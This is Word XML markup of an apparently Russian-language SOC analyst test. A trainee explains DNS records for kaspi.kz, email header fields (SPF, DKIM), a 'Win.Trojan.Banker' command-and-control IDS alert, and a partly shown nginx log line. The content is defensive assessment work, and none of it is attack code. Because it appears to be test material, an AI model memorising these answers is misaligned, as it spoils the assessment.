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3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7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A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задания:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000002" w14:textId="40D252B9" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7" w:rsidP="00B277C6">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="160" w:line="252" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделать описание каждой строчке результата</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidRPr="00A0419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7">
        <w:r w:rsidRPr="00A0419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2whois.ru/?t=dns&amp;data=kaspi.kz</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05059FB4" w14:textId="47F41A3E" w:rsidR="0099660A" w:rsidRPr="00A04197" w:rsidRDefault="00B277C6" w:rsidP="0099660A">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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Страница представляет собой информацию о DNS-записях для домена kaspi.kz. </w:t>
      </w:r>
      <w:r w:rsidR="0099660A" w:rsidRPr="00A0419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9660A"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– интернет указывает на то что хост находиться в интернете. </w:t>
      </w:r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>Значение TTL означает время жизни записи в секундах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53D546" w14:textId="18932ED3" w:rsidR="00B277C6" w:rsidRPr="00A04197" w:rsidRDefault="00B277C6" w:rsidP="00B277C6">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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DF18B3" wp14:editId="1CC34792">
            <wp:extent cx="5695950" cy="478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0D99" w14:textId="0F66337F" w:rsidR="0099660A" w:rsidRPr="00A04197" w:rsidRDefault="0099660A" w:rsidP="00B277C6">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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ED254D2" wp14:editId="47964A9D">
            <wp:extent cx="5733415" cy="32861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6AD" w14:textId="77777777" w:rsidR="0099660A" w:rsidRPr="00A04197" w:rsidRDefault="0099660A" w:rsidP="00B277C6">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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Типы указанные в записи это </w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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04197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4197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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>айпи</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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адрес= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>194.187.245.10 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="686FDAE7" w14:textId="3B6B7DE3" w:rsidR="00D54CDD" w:rsidRPr="00A04197" w:rsidRDefault="0099660A" w:rsidP="00F731B9">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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4197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записи </w:t>
      </w:r>
      <w:r w:rsidR="00D54CDD" w:rsidRPr="00A04197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>серверов ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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4197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– авторитетная запись которая указывает на DNS-сервер ns.kaspi.kz в качестве исходного источника информации о домене в нем содержаться информация ns.kaspi.kz- имя DNS-сервера является источником информации о домене. hostmaster.kaspi.kz- адрес ответственного за домен. 2016081501 - серийный номер записи, который инкрементируется при каждом обновлении записи. 10800 - время жизни записи TTL. 36</w:t>
      </w:r>
      <w:r w:rsidR="00F731B9" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>00 - интервал обновления запись</w:t>
      </w:r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>. 604800 - интервал перепроверки записи. 3600 - минимальный TTL в секундах для данной записи.,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4197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A0419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4197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для обмеривания письмами по почте </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197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A041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чем меньше приоритет, тем главнее,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4197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>адрес сервера,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 принимающий почту тут это </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bmss-02d.kaspi.kz</w:t>
      </w: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0419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F731B9"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- ключи подтверждения авторства </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F731B9" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>майкрасофт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F731B9"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31B9" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>амазон</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F731B9"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31B9" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>циско</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F731B9"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31B9" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>гугл</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. В конце указано обратное определение доменного имени в котором тип записи пойнтер </w:t>
      </w:r>
      <w:r w:rsidR="00D54CDD" w:rsidRPr="00A04197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D54CDD" w:rsidRPr="00A041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03" w14:textId="67454B8A" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7" w:rsidP="00D54CDD">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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A0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A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Разобрать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0419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A04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197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04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (разобрать и описать только нужные значения и потом суметь объяснить их применимость);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A527F34" w14:textId="0338E545" w:rsidR="00F731B9" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000EE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Email</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">  </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Header</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FB3AC73" w14:textId="0C8A6994" w:rsidR="00F731B9" w:rsidRPr="00A04197" w:rsidRDefault="00F731B9" w:rsidP="00ED292C">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В заголовке можно увидеть, что это письмо мы сразу же видим отправителя </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Received</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0419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04197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A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exch3.localhost (10.1.1.1)</w:t>
      </w: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адресом его хоста </w:t>
      </w:r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же видим сервер и то что письмо прошло от нескольких серверов тип шифрования тоже написан конечно же дата отправки и время указаны Заголовок также содержит некоторые результаты аутентификации, которые указывают на то, что электронное письмо прошло проверку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Sender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Policy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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SPF) и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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DomainKeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Identified</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Mail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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DKIM), которые используются для проверки личности отправителя и снижения риска подделки электронной почты. Также указаны потенциальные </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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йпи</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED292C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дреса через которое могло быть отправлено письмо. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000005" w14:textId="38C02E0E" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="25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419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A0419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04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>От системы получено уведомление «JobSFMail-Date.Hash.txt» что оно значит (нужно расписать как ты понимаешь данное уведомление и к чему оно может привести);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006" w14:textId="77777777" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240" w:after="160" w:line="252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1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>JobSFMail</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2809EE52" w14:textId="64F089EF" w:rsidR="00ED292C" w:rsidRPr="00A04197" w:rsidRDefault="00ED292C" w:rsidP="00EA0F9D">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В файле указаны дата и время и то что в это время были обнаружены вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MALWARE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Trojan</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Banker</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>variant</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>outbound</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1:23262:7) (+3). 3 означает количество </w:t>
      </w:r>
      <w:r w:rsidR="00EA0F9D" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">типов соединения данного типа. Нужно исследовать потенциальный вред данного файла и найти источник чтобы полностью оценить риск данной угрозы для дальнейшего решения проблемы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007" w14:textId="568E3166" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr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  <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>На сайте</w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="00A0419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3">
        <w:r w:rsidRPr="00A04197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regex101.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> разобрать «Пример логов 1.txt» и дать описание полезным по вашему мнению полям (Имя пользователя, IP адреса и порты источника и назначения, какое событие, статусы и т.д.);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008" w14:textId="77777777" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr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  <w:hyperlink r:id="rId14">
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Пример логов</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24DAD314" w14:textId="77777777" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#1 NGINX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C83E97" w14:textId="6F0748D1" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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10.1.2.3 – source address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A450D2" w14:textId="310C404D" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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109.166.59.44 – destination address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6BF19" w14:textId="79582156" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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[17/Nov/2019:03:17:59 +0600] – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>точное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время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и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дата</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC93D6" w14:textId="57356CE3" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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>"GET /shop-ext/suggestions</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/?i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=productDetails&amp;m=true&amp;t=IP&amp;pi=14701657&amp;u=3729495 HTTP/1.1" – http get </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1DC36" w14:textId="299EB1EB" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">200 – соединение установлено или запрос успешен </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0200FEAF" w14:textId="5976C2B3" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D" w:rsidP="00EA0F9D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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>kaspi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>kz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>shop</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>gerbor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vusher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-13-9-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nimfea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>belyi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>gljanets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
